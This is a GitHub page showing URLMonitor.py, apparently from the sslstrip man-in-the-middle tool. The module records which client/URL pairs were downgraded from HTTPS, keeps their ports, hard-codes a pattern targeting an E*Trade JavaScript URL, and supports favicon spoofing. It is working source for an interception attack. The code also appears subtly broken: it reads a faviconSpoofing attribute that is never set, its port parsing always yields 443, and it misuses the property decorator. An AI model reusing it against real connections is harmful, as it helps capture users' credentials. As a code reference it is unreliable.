-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathURLMonitor.py
More file actions
82 lines (64 loc) · 2.56 KB
/
URLMonitor.py
File metadata and controls
82 lines (64 loc) · 2.56 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import re
class URLMonitor:
"""
The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
server is expecting over SSL. It also keeps track of secure favicon urls.
"""
# Start the arms race, and end up here...
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
_instance = None
def __init__(self):
self.strippedURLs = set()
self.strippedURLPorts = {}
self.faviconReplacement = False
def isSecureLink(self, client, url):
for expression in URLMonitor.javascriptTrickery:
if re.match(expression, url):
return True
return (client, url) in self.strippedURLs
def getSecurePort(self, client, url):
if (client, url) in self.strippedURLs:
return self.strippedURLPorts[(client, url)]
else:
return 443
def addSecureLink(self, client, url):
methodIndex = url.find("//") + 2
method = url[0:methodIndex]
pathIndex = url.find("/", methodIndex)
host = url[methodIndex:pathIndex]
path = url[pathIndex:]
port = 443
portIndex = host.find(":")
if portIndex != -1:
host = host[0:portIndex]
port = host[portIndex + 1:]
if len(port) == 0:
port = 443
url = method + host + path
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
def isSecureFavicon(self, client, url):
return (True is self.faviconSpoofing) and (url.find("favicon-x-favicon-x.ico") != -1)
@property
def getInstance():
if URLMonitor._instance is None:
URLMonitor._instance = URLMonitor()
return URLMonitor._instance
getInstance = staticmethod(getInstance)